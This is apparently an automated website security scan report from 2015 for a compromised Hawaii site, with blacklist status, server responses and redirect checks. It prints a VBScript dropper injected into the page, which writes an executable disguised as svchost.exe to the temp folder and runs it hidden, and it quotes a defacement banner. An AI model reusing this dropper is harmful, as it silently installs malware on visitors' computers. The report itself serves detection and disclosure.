Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=justdreamshawaii.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://justdreamshawaii.net/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 09 Sep 2015 04:23:18 GMT Location: http://www.justdreamshawaii.net/ Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.justdreamshawaii.net/xmlrpc.php | clean |
http://www.justdreamshawaii.net/ | 200 OK Content-Length: 114584 Content-Type: text/html | suspicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
Deface/Content modification. The following signature was found: HACKED BY AYYILDIZ TEAM INTERNATIONAL FORCE <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head><link rel="Shortcut Icon" href="http://i.hizliresim.com/eoLDm9.png" type="image/x-icon"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>HACKED BY AYYILDIZ TEAM INTERNATIONAL FORCE</title> <style type="text/css"> body { background-color: #000000; background-image: url(http://i.hizliresim.com/glORlL.jpg); background-size:100%; margin:0px;padding:0px; min-width:650px; background-clip:box; background-origin:padding-box; background-repeat:no-repeat; background-position:center; background-attachment:fixed;} .st ...[114065 bytes skipped]... | ||
http://www.justdreamshawaii.net/test404page.js | 404 Not Found Content-Length: 151 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: justdreamshawaii.net
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 09 Sep 2015 04:23:18 GMT
Location: http://www.justdreamshawaii.net/
Server: Apache
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.justdreamshawaii.net/xmlrpc.php
...0 bytes of data.
GET / HTTP/1.1
Host: justdreamshawaii.net
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 09 Sep 2015 04:23:18 GMT
Location: http://www.justdreamshawaii.net/
Server: Apache
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.justdreamshawaii.net/xmlrpc.php
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: justdreamshawaii.net
Referer: http://www.google.com/search?q=justdreamshawaii.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: justdreamshawaii.net
Referer: http://www.google.com/search?q=justdreamshawaii.net
Result:
The result is similar to the first query. There are no suspicious redirects found.